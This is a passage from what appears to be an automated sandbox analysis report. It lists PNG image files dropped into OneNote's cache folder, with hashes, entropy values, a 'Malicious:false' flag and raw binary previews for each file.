                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
